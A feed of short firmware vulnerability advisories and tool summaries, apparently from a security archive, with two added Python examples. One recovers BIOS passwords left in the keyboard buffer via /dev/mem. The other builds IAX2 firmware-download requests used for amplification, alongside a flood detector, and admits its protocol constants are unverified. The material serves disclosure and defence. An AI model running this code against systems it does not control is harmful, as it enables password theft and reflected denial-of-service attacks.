Vigilante Advisory #7 - A malicious user can crash an Intel Express 550F switch, or a host behind it, by sending a packet with a malformed header. To restart the box you need to remove it from its power source, as the reset button loses functionality as well. Affected systems: Intel Express Switch 550F, firmware versions 2.63 and 2.64.
e5543dcadd99ee203a752f663a687366bd68f30736388f7036df6793e11c9e4c
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6) is vulnerable to an Insecure Direct Object Reference vulnerability. When exploited by an authenticated attacker, such vulnerability could lead to compromising the security of the appliance, allowing OS command execution, local file inclusion resulting in exposure of appliance configuration files, source code, etc.
4faf8158f2565688d604706ac1cf4006697d9a3c4dc9926cebbe5d8ab0579ade
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6 and 2.5) is vulnerable to multiple persistent and reflected XSS attacks. When exploited by an external/internal attacker, such identified vulnerabilities could lead to Session Hijack, Information Disclosure, force installation of malicious file or Trojan on users' PCs, etc.
7d77648766361a40b7d96f7ef892d0dab12d44b36490044262f591af031bf755
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6 and 2.5) is vulnerable to XSRF attacks. When exploited by an attacker, the identified vulnerabilities could lead to compromising the security of the appliance, including unauthorized alteration of appliance's settings, DoS attacks, etc.
e79b5a9fb4e89af714cf275dfcd4e03761b0ba0e0db20144b1e00d48f36b7d68
Tandberg MXP systems with firmware prior to 9.0 suffer from an SNMP-related denial of service vulnerability.
7a27927c605b454f1e6b03e8335b08ee519475e3f0fc0627c3d6fe6dcd38f69e
McAfee UTM Firewall firmware versions 3.0.0 through 4.0.6 suffer from a cross site scripting vulnerability.
d74a18c2c94d3ec9137055c30cb90322d16fe5992676d7772281967380bf88d1
Secunia Security Advisory - A vulnerability has been reported in Snom VoIP Phone Firmware, which can be exploited by malicious people to bypass certain security restrictions.
513ca15470bda1ae480e9eab09b861ea156ef118cfa8ba1b1c7a18ee13b8a52b
iOmega Home Media Network Hard Drive firmware versions 2.038 through 2.061 suffer from an unauthenticated access vulnerability.
2cd1de52837d1fdcc72f8f653ffe102295eda8e88b928a3da31fdfe6dfcfb58f
Virtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical.
db51c425156ad6e9f3fa40fb9a1383e98edfded1cb0710c6c58c4a658f0b3a0b
Secunia Security Advisory - A vulnerability has been reported in Broadcom Integrated NIC Management Firmware for HP PCs, which can be exploited by malicious people to compromise a vulnerable system.
edbfcb722522d366f075a5e520a388cfcb72317593dd3a50d8e5e6df836bb7fc
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is modelled on the non-open-source OFPW utility and works on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post-install item) and pen tests (recovering the EFI firmware password).
83fe779b6bcdb2cbbb4da3359a7a5d0e75ca7ff27c8901c902ff4d15ec0f684b
Hacking D-Link Routers With HNAP - Multiple D-Link routers suffer from insecure implementations of the Home Network Administration Protocol which allow unauthenticated and/or unprivileged users to view and configure administrative settings on the router. Further, the mere existence of HNAP allows attackers to completely bypass the CAPTCHA login features that D-Link has made available in recent firmware releases.
e9ae50f05b83bf98f76e90aa3dd3f3e9bf3fea8493bf25bf0c5291e5191f43a3
The Barracuda Web Application Firewall 660 with firmware 7.3.1.007 suffers from input validation vulnerabilities that allow for session hijacking and more.
bf65427cf42c5a384779e3d121dfd96b62f502dac235f59d56843334b08a4a7d
Obeseus is a light-weight, high-speed IP DDoS detector that has been designed to run on an Intel probe fitted with an advanced 10 Gb/s FPGA card. Firmware routines on the card ensure that the attack is identified right down to host/port with zero load on the PCI bus. This is the pre-port-to-FPGA beta version, written in C using PCAP and BPF.
b67e244ec592a0c5a1242966f36937d8dfd7d5e17d6725951479d2a05fc108b9
The Everfocus EDSR firmware fails to correctly handle authentication and sessions. This remote exploit takes advantage of versions 1.4 and below and lets you view the live cameras of remote DVRs.
10026da1a7949dc0eaf28f986ef241f8679e65ad5c74df580ec8f86a61a39823
Cisco Security Advisory - Cisco Video Surveillance Stream Manager firmware for the Cisco Video Surveillance Services Platforms and Cisco Video Surveillance Integrated Services Platforms contain a denial of service (DoS) vulnerability that could result in a reboot on systems that receive a crafted packet. Cisco Video Surveillance 2500 Series IP Cameras contain an information disclosure vulnerability that could allow an authenticated user to view any file on a vulnerable camera. Cisco has released free software updates that address these vulnerabilities. There are no workarounds that mitigate these vulnerabilities.
3b56d120b6856f73ef48b6879e7de75cf47fb8f500ff02f80c93c32f09dfc51d
Secunia Research has discovered a vulnerability in Garmin Communicator Plug-In, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to a synchronisation error in the GARMINAXCONTROL.GarminAxControl_t.1 ActiveX control (npGarmin.dll). This can be exploited to bypass the domain locking and dialog box presented to the user asking for confirmation that the untrusted site may access private data. Successful exploitation allows full access (such as deleting data, retrieving personal information, or installing firmware updates) to any Garmin GPS products connected to the user's system. Garmin Communicator Plug-In (npGarmin.dll) version 2.6.4.0 is affected.
d2f086ac3f174a9241e5c568f24970ed3a5b1893adb4e0b56c252fa22c46ae09
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is modelled on the non-open-source OFPW utility and works on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post-install item) and pen tests (recovering the EFI firmware password).
32600871a5188868b50004beb3b523ddca7180f0dcad55c13de60f87401435fa
Linksys Wireless ADSL Router httpd denial of service exploit for WAG54G V.2 with firmware 1.02.20.
14dd874d904b5b4eacda3a2f64f6d57318849cd08be9a4e01e8fc280387d9dc3
Secunia Security Advisory - A vulnerability has been reported in Sun System Firmware, which can be exploited by malicious, local users to bypass certain security restrictions.
bdea59d092405f0d2b8d983835f4cf3a860a3658e439ddd72b003444fa34c3ad
The Netgear WN802T (firmware 1.3.16) with the MARVELL 88W8361P-BEM1 chipset suffers from a NULL SSID association request vulnerability that allows for denial of service and possibly code execution.
ccb13de54f066e877156a14ba07fa1ac4f865e9ef7de15ecd8de515a0d4f33f9
The Netgear WN802T (firmware 1.3.16) with the MARVELL 88W8361P-BEM1 chipset suffers from an overflow vulnerability when parsing malformed EAPoL-Key packets.
38d2065be0b8a4aeb8224079f08d4c79ba5ac17ce0b4e9162721a30007efe569
The password checking routine of the IBM Lenovo BIOS firmware fails to sanitize the BIOS keyboard buffer after reading user input, resulting in plain text password leakage to local users.
a488508939d0aa7156c8686aa75fbaba363e073efc4b44072a2a13c40dde1e04
The password checking routine of Intel BIOS firmware fails to sanitize the BIOS keyboard buffer after reading user input, resulting in plain text password leakage to local users.
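The two BIOS keyboard buffer entries above (IBM Lenovo and Intel) describe the same defect: the BIOS Data Area keyboard ring buffer at physical 0x40:0x1E (16 two-byte ASCII/scan-code slots, with head and tail pointers at 0x40:0x1A and 0x40:0x1C) is left holding whatever the user typed at the password prompt, so any local user who can read low physical memory can recover it. The following is an added example, not code from either advisory: a decoder for that buffer, run here over a constructed BDA image and, when available, over a real one read from /dev/mem (x86 Linux typically still permits reads of the first 1 MiB even with CONFIG_STRICT_DEVMEM, but root and no kernel lockdown are assumed). The scan codes in the constructed sample are zeroed because the decoder only needs the ASCII byte.

```python
"""
Recover keystrokes left behind in the BIOS keyboard ring buffer (BDA).
Added example for the IBM Lenovo / Intel BIOS keyboard buffer advisories;
not vendor or advisory code. Offsets are the standard BIOS Data Area layout.
"""
import struct

BDA_BASE = 0x400          # physical address of the BIOS Data Area (segment 0x40)
KBD_HEAD = 0x1A           # word: offset (from seg 0x40) of next key to be read
KBD_TAIL = 0x1C           # word: offset of next free slot (keys are written here)
KBD_BUF_START = 0x1E      # 16 slots of (ascii, scancode) follow
KBD_BUF_END = 0x3E        # exclusive; the ring wraps here back to KBD_BUF_START
BDA_LEN = 0x40


def decode_keyboard_buffer(bda: bytes) -> str:
    """bda: at least 0x40 bytes copied from physical address 0x400.

    Returns the printable ASCII characters still present in the ring,
    oldest first. The firmware bug is that head == tail after the password
    is consumed, yet the slots are never cleared, so we ignore head and walk
    the whole ring starting at tail (the oldest surviving slot once wrapped).
    """
    if len(bda) < BDA_LEN:
        raise ValueError("need at least 0x40 bytes of BDA")
    _head, tail = struct.unpack_from("<HH", bda, KBD_HEAD)
    # Fall back to the buffer start if the pointer is outside the ring or odd.
    if not (KBD_BUF_START <= tail < KBD_BUF_END) or tail % 2:
        tail = KBD_BUF_START
    chars = []
    off = tail
    for _ in range((KBD_BUF_END - KBD_BUF_START) // 2):
        ascii_code = bda[off]          # low byte: ASCII, high byte: scan code
        if 0x20 <= ascii_code < 0x7F:  # skip empty slots and control keys (Enter etc.)
            chars.append(chr(ascii_code))
        off += 2
        if off >= KBD_BUF_END:
            off = KBD_BUF_START
    return "".join(chars)


def build_sample_bda(typed: bytes) -> bytes:
    """Constructed BDA image imitating a BIOS that read `typed` and did not
    clear the ring: head == tail (all keys consumed) but the slots keep the data.
    Scan codes are left as 0 here; only the ASCII byte matters for recovery."""
    if len(typed) > 16:
        raise ValueError("the BIOS ring only holds 16 slots")
    bda = bytearray(BDA_LEN)
    for i, c in enumerate(typed):
        bda[KBD_BUF_START + 2 * i] = c
    end = KBD_BUF_START + 2 * len(typed)
    struct.pack_into("<HH", bda, KBD_HEAD, end, end)
    return bytes(bda)


def read_bda_from_devmem(path: str = "/dev/mem"):
    """Read the live BDA; returns None when not permitted (non-root, lockdown)."""
    try:
        with open(path, "rb", buffering=0) as f:
            f.seek(BDA_BASE)
            data = f.read(BDA_LEN)
        return data if len(data) == BDA_LEN else None
    except OSError:
        return None


if __name__ == "__main__":
    live = read_bda_from_devmem()
    if live is not None:
        print("live BDA keyboard buffer:", repr(decode_keyboard_buffer(live)))
    else:
        sample = build_sample_bda(b"s3cret\r")   # constructed input: password + Enter
        print("constructed sample recovers:", repr(decode_keyboard_buffer(sample)))
```

The recovered string is the password the BIOS prompt consumed, with Enter dropped as a control key. The real fix is for the firmware to zero the 32 slots (and not merely reset the pointers) after reading the password; an OS-side workaround is to overwrite the ring at the same physical address as early as possible in boot, before unprivileged users can read it.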
a3dae1efa2a513a1e4d34e8620de7b40c67b3bd5327e513a672c4257d6bfcb28
Asterisk Project Security Advisory - An attacker may request that an Asterisk server send part of a firmware image. Because this firmware download protocol does not perform a handshake first, the source address may be spoofed. An IAX2 FWDOWNL request for a firmware file may be as small as 40 bytes, yet produces a 1040-byte response, an amplification factor of about 26. Coupled with multiple geographically diverse Asterisk servers, an attacker may flood a victim site with unwanted firmware packets.
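The amplification described above is easiest to see on the wire. The following is an added example, not Asterisk project code: it builds the 40-byte IAX2 full frame that carries a FWDOWNL request (12-byte header, a DEVICETYPE IE and a 4-byte FWBLOCKDESC IE), parses full frames back out of UDP/4569 payloads, and counts FWDOWNL requests per claimed source so a reflector operator can spot a flood aimed at a spoofed victim. The frame-type, command and IE numbers are taken from RFC 5456 from memory and should be checked against the RFC or Asterisk's iax2.h before being relied on; the device-type string and IP addresses are constructed for the example.

```python
"""
IAX2 FWDOWNL amplification: request builder, full-frame parser and a
per-source detector. Added example, not Asterisk project code.
Numeric constants: RFC 5456 as recalled (assumption; verify before use).
"""
import struct
from collections import Counter

IAX2_PORT = 4569
FRAMETYPE_IAX = 0x06        # IAX control frame
IAX_CMD_FWDOWNL = 0x24      # firmware download request (assumed value)
IAX_CMD_FWDATA = 0x25       # firmware data reply (assumed value)
IE_DEVICETYPE = 0x20        # assumed IE numbers
IE_FWBLOCKDESC = 0x23
IE_FWBLOCKDATA = 0x24
FWDATA_REPLY_LEN = 1040     # reply size stated in the advisory


def build_fwdownl(src_call: int, devtype: bytes, block: int) -> bytes:
    """Full frame: F bit set on the source call number, dest call 0 (no call
    was ever set up, which is exactly why the source can be spoofed)."""
    hdr = struct.pack(">HHIBBBB", 0x8000 | (src_call & 0x7FFF), 0, 0, 0, 0,
                      FRAMETYPE_IAX, IAX_CMD_FWDOWNL)
    ies = (bytes([IE_DEVICETYPE, len(devtype)]) + devtype
           + bytes([IE_FWBLOCKDESC, 4]) + struct.pack(">I", block))
    return hdr + ies


def parse_full_frame(payload: bytes):
    """Return (frametype, subclass, ies) for an IAX2 full frame, else None.
    Mini frames (F bit clear) and truncated IE lists are rejected."""
    if len(payload) < 12:
        return None
    scall, _dcall, _ts, _oseq, _iseq, ftype, subclass = struct.unpack_from(">HHIBBBB", payload, 0)
    if not scall & 0x8000:
        return None
    ies, off = {}, 12
    while off + 2 <= len(payload):
        ie_id, ie_len = payload[off], payload[off + 1]
        data = payload[off + 2: off + 2 + ie_len]
        if len(data) != ie_len:
            return None
        ies[ie_id] = data
        off += 2 + ie_len
    if off != len(payload):
        return None
    return ftype, subclass & 0x7F, ies


def find_fwdownl_sources(packets, threshold: int = 5) -> dict:
    """packets: iterable of (src_ip, udp_payload). Returns {src_ip: count}
    for sources sending at least `threshold` FWDOWNL requests. On a reflector
    the src_ip is the spoofed victim, so a high count names the target."""
    counts = Counter()
    for src, payload in packets:
        parsed = parse_full_frame(payload)
        if parsed and parsed[0] == FRAMETYPE_IAX and parsed[1] == IAX_CMD_FWDOWNL:
            counts[src] += 1
    return {s: n for s, n in counts.items() if n >= threshold}


def reflected_bytes(request: bytes, n_requests: int, reply_len: int = FWDATA_REPLY_LEN):
    """Bytes sent to the spoofed source and the amplification factor."""
    return n_requests * reply_len, reply_len / len(request)


if __name__ == "__main__":
    req = build_fwdownl(1, b"iaxy-firmware-device", 0)   # constructed 20-byte device type
    print("request bytes:", len(req))
    # Constructed traffic: 6 spoofed requests "from" the victim, 1 from elsewhere.
    traffic = [("203.0.113.5", req)] * 6 + [("198.51.100.9", req)]
    print("suspect sources:", find_fwdownl_sources(traffic))
    print("reflected bytes, factor:", reflected_bytes(req, 6))
```

The practical mitigation is the one the advisory implies: serve firmware only to authenticated peers or disable FWDOWNL, and on the network side rate-limit IAX control frames per source and apply BCP 38 egress filtering so spoofed requests never reach the reflector.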
033fd05fff387ab0474d5a49f0a057699dcb0943d8893658905cf254d19d1aa2
The Linksys WRT54G (firmware 1.00.9) suffers from multiple security bypass vulnerabilities.
6b72b26de9c2d8e0c66310a390f706c7cbc59b771a63edf2616425a62a197785